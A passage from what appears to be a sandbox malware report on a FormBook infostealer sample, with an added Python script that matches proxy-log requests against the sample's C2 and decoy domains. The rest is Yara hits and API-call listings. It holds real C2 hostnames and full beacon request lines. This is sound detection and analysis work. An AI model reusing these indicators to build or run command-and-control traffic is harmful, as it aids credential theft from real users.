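The configuration under Malware Configuration and the captured HTTP requests above fit together in a way that matters for response: the bot beaconed to www.thatlocaljawn.com and www.tabandolano.online, both decoy entries, as well as to the real C2 www.warungsuntik.com, using the same /rcv/ path, no User-Agent, Connection: close and the same second query value (jL08l2=WXL00450GFoHk) each time. So a proxy hit on a decoy domain is still an infected host, and blocking only the configured C2 leaves the beacon shape visible. The block below is an added example of that correlation, written for this page and not part of the Joe Sandbox report: the config and request lines are copied from the page (the decoy list is cut to a few of the 64 entries, as noted in the code), and the function names and the check-in heuristic are my own.

```python
# Configuration as extracted from 3.2.cryptedprof.exe.400000.0.raw.unpack
# (copied from the report). The decoy list is a subset of the 64 entries on
# the page, shortened here; the real list should be used as-is.
CONFIG = {
    "C2 list": ["www.warungsuntik.com/rcv/"],
    "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com",
              "tabandolano.online", "thatlocaljawn.com", "honeybadgerpodcast.com"],
}

# Requests captured by the sandbox (copied from the Networking section):
# (request line, headers). Only Host and Connection were sent; no User-Agent.
CAPTURED = [
    ("GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1",
     {"Host": "www.thatlocaljawn.com", "Connection": "close"}),
    ("GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1",
     {"Host": "www.warungsuntik.com", "Connection": "close"}),
    ("GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1",
     {"Host": "www.tabandolano.online", "Connection": "close"}),
]


def canon(host: str) -> str:
    """Lower-case and drop a leading 'www.' so config entries and Host headers compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_hosts_and_paths(cfg):
    """Split 'host/path/' C2 entries into a canonical host set and a path set."""
    hosts, paths = set(), set()
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        hosts.add(canon(host))
        paths.add("/" + path)
    return hosts, paths


def classify_host(host: str, cfg) -> str:
    """'c2' for a configured C2 host, 'decoy' for a decoy entry, else 'unknown'."""
    c2_hosts, _ = c2_hosts_and_paths(cfg)
    h = canon(host)
    if h in c2_hosts:
        return "c2"
    if h in {canon(d) for d in cfg["decoy"]}:
        return "decoy"
    return "unknown"


def alert_hosts(cfg) -> set:
    """Every host this config can beacon to: the C2 plus all decoys."""
    c2_hosts, _ = c2_hosts_and_paths(cfg)
    return c2_hosts | {canon(d) for d in cfg["decoy"]}


def query_params(target: str):
    """Raw key/value split of the query string. No percent or '+' decoding, so
    the base64-like first value (which contains '+' and '/') is kept as sent."""
    path, _, query = target.partition("?")
    pairs = []
    for item in query.split("&"):
        if item:
            k, _, v = item.partition("=")
            pairs.append((k, v))
    return path, pairs


def looks_like_checkin(request_line: str, headers: dict, cfg) -> bool:
    """Shape of the beacons on this page: GET to the config's C2 path, exactly
    two query parameters, no User-Agent header, Connection: close."""
    method, target, _ = request_line.split(" ", 2)
    path, params = query_params(target)
    _, c2_paths = c2_hosts_and_paths(cfg)
    hdrs = {k.lower(): v for k, v in headers.items()}
    return (method == "GET" and path in c2_paths and len(params) == 2
            and "user-agent" not in hdrs
            and hdrs.get("connection", "").lower() == "close")


def second_param_values(captured) -> set:
    """Second query value of each request. It is identical across the three
    beacons on this page, so it is a pivot for hunting regardless of Host."""
    return {query_params(line.split(" ", 2)[1])[1][1][1] for line, _ in captured}


def triage(captured, cfg):
    """One row per captured request: host, its role in the config, and whether
    the request has the check-in shape."""
    rows = []
    for request_line, headers in captured:
        host = headers.get("Host", "")
        rows.append({"host": host, "role": classify_host(host, cfg),
                     "checkin": looks_like_checkin(request_line, headers, cfg)})
    return rows


if __name__ == "__main__":
    for row in triage(CAPTURED, CONFIG):
        print(f"{row['host']:28s} {row['role']:8s} checkin={row['checkin']}")
    print("stable second parameter:", second_param_values(CAPTURED))
```

Feed `triage` with request lines from a proxy log instead of `CAPTURED` and the same three checks apply; `looks_like_checkin` will also flag beacons to hosts absent from this particular config, which is what you want when the operator rotates domains.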

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419D60 NtCreateFile, | 3_2_00419D60
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E10 NtReadFile, | 3_2_00419E10
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E90 NtClose, | 3_2_00419E90
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419F40 NtAllocateVirtualMemory, | 3_2_00419F40
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419D5A NtCreateFile, | 3_2_00419D5A
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419DB4 NtReadFile, | 3_2_00419DB4
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419E8A NtClose, | 3_2_00419E8A
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00419F3C NtAllocateVirtualMemory, | 3_2_00419F3C
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk, | 3_2_00AF98F0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk, | 3_2_00AF9860
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk, | 3_2_00AF9840
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk, | 3_2_00AF99A0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, | 3_2_00AF9910
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk, | 3_2_00AF9A20
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk, | 3_2_00AF9A00
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk, | 3_2_00AF9A50
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF95D0 NtClose,LdrInitializeThunk, | 3_2_00AF95D0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk, | 3_2_00AF9540
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk, | 3_2_00AF96E0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk, | 3_2_00AF9660
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk, | 3_2_00AF97A0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk, | 3_2_00AF9780
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk, | 3_2_00AF9710
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF98A0 NtWriteVirtualMemory, | 3_2_00AF98A0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9820 NtEnumerateKey, | 3_2_00AF9820
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFB040 NtSuspendThread, | 3_2_00AFB040
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF99D0 NtCreateProcessEx, | 3_2_00AF99D0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9950 NtQueueApcThread, | 3_2_00AF9950
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A80 NtOpenDirectoryObject, | 3_2_00AF9A80
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9A10 NtQuerySection, | 3_2_00AF9A10
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFA3B0 NtGetContextThread, | 3_2_00AFA3B0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9B00 NtSetValueKey, | 3_2_00AF9B00
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF95F0 NtQueryInformationFile, | 3_2_00AF95F0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9520 NtWaitForSingleObject, | 3_2_00AF9520
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AFAD30 NtSetContextThread, | 3_2_00AFAD30
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9560 NtWriteFile, | 3_2_00AF9560
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF96D0 NtCreateKey, | 3_2_00AF96D0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9610 NtEnumerateValueKey, | 3_2_00AF9610
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9670 NtQueryInformationProcess, | 3_2_00AF9670
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AF9650 NtQueryValueKey, | 3_2_00AF9650
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9860 NtQuerySystemInformation,LdrInitializeThunk, | 7_2_046D9860
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9840 NtDelayExecution,LdrInitializeThunk, | 7_2_046D9840
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9540 NtReadFile,LdrInitializeThunk, | 7_2_046D9540
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, | 7_2_046D9910
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D95D0 NtClose,LdrInitializeThunk, | 7_2_046D95D0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D99A0 NtCreateSection,LdrInitializeThunk, | 7_2_046D99A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9660 NtAllocateVirtualMemory,LdrInitializeThunk, | 7_2_046D9660
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A50 NtCreateFile,LdrInitializeThunk, | 7_2_046D9A50
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9650 NtQueryValueKey,LdrInitializeThunk, | 7_2_046D9650
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D96E0 NtFreeVirtualMemory,LdrInitializeThunk, | 7_2_046D96E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D96D0 NtCreateKey,LdrInitializeThunk, | 7_2_046D96D0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9710 NtQueryInformationToken,LdrInitializeThunk, | 7_2_046D9710
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9FE0 NtCreateMutant,LdrInitializeThunk, | 7_2_046D9FE0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9780 NtMapViewOfSection,LdrInitializeThunk, | 7_2_046D9780
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DB040 NtSuspendThread, | 7_2_046DB040
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9820 NtEnumerateKey, | 7_2_046D9820
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D98F0 NtReadVirtualMemory, | 7_2_046D98F0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D98A0 NtWriteVirtualMemory, | 7_2_046D98A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9560 NtWriteFile, | 7_2_046D9560
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9950 NtQueueApcThread, | 7_2_046D9950
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9520 NtWaitForSingleObject, | 7_2_046D9520
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DAD30 NtSetContextThread, | 7_2_046DAD30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D95F0 NtQueryInformationFile, | 7_2_046D95F0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D99D0 NtCreateProcessEx, | 7_2_046D99D0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9670 NtQueryInformationProcess, | 7_2_046D9670
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A20 NtResumeThread, | 7_2_046D9A20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A00 NtProtectVirtualMemory, | 7_2_046D9A00
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9610 NtEnumerateValueKey, | 7_2_046D9610
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A10 NtQuerySection, | 7_2_046D9A10
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9A80 NtOpenDirectoryObject, | 7_2_046D9A80
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9760 NtOpenProcess, | 7_2_046D9760
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9770 NtSetInformationFile, | 7_2_046D9770
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA770 NtOpenThread, | 7_2_046DA770
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9730 NtQueryVirtualMemory, | 7_2_046D9730
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D9B00 NtSetValueKey, | 7_2_046D9B00
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA710 NtOpenProcessToken, | 7_2_046DA710
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046D97A0 NtUnmapViewOfSection, | 7_2_046D97A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046DA3B0 NtGetContextThread, | 7_2_046DA3B0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E90 NtClose, | 7_2_02C79E90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E10 NtReadFile, | 7_2_02C79E10
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79F40 NtAllocateVirtualMemory, | 7_2_02C79F40
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79D60 NtCreateFile, | 7_2_02C79D60
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79E8A NtClose, | 7_2_02C79E8A
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79F3C NtAllocateVirtualMemory, | 7_2_02C79F3C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79DB4 NtReadFile, | 7_2_02C79DB4
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C79D5A NtCreateFile, | 7_2_02C79D5A
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, | 1_2_00403486
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00407272 | 1_2_00407272
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_00406A9B | 1_2_00406A9B
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 1_2_70991A98 | 1_2_70991A98
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00401027 | 3_2_00401027
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00401030 | 3_2_00401030
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041E03E | 3_2_0041E03E
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041E2A1 | 3_2_0041E2A1
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041D38B | 3_2_0041D38B
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041D5F1 | 3_2_0041D5F1
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00402D90 | 3_2_00402D90
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00409E40 | 3_2_00409E40
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00409E3B | 3_2_00409E3B
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041DF46 | 3_2_0041DF46
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_0041CFA6 | 3_2_0041CFA6
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE20A0 | 3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B820A8 | 3_2_00B820A8
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACB090 | 3_2_00ACB090
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B828EC | 3_2_00B828EC
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B8E824 | 3_2_00B8E824
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA830 | 3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B71002 | 3_2_00B71002
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD99BF | 3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD4120 | 3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ABF900 | 3_2_00ABF900
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B822AE | 3_2_00B822AE
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74AEF | 3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B6FA2B | 3_2_00B6FA2B
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEEBB0 | 3_2_00AEEBB0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B623E3 | 3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7DBD2 | 3_2_00B7DBD2
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B703DA | 3_2_00B703DA
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AEABD8 | 3_2_00AEABD8
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82B28 | 3_2_00B82B28
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADA309 | 3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ADAB40 | 3_2_00ADAB40
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B74496 | 3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AC841F | 3_2_00AC841F
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7D466 | 3_2_00B7D466
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AE2581 | 3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00ACD5E0 | 3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B825DD | 3_2_00B825DD
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AB0D20 | 3_2_00AB0D20
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82D07 | 3_2_00B82D07
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B81D55 | 3_2_00B81D55
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B82EF7 | 3_2_00B82EF7
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00AD6E30 | 3_2_00AD6E30
          Source: C:\Users\user\Desktop\cryptedprof.exe | Code function: 3_2_00B7D616 | 3_2_00B7D616
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046A841F | 7_2_046A841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04751002 | 7_2_04751002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046C20A0 | 7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_047620A8 | 7_2_047620A8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046AB090 | 7_2_046AB090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04761D55 | 7_2_04761D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04690D20 | 7_2_04690D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046B4120 | 7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0469F900 | 7_2_0469F900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762D07 | 7_2_04762D07
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046AD5E0 | 7_2_046AD5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046C2581 | 7_2_046C2581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046B6E30 | 7_2_046B6E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762EF7 | 7_2_04762EF7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_047622AE | 7_2_047622AE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04762B28 | 7_2_04762B28
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_04761FF1 | 7_2_04761FF1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0475DBD2 | 7_2_0475DBD2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_046CEBB0 | 7_2_046CEBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7E2A1 | 7_2_02C7E2A1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7D38B | 7_2_02C7D38B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02C7E03E | 7_2_02C7E03E
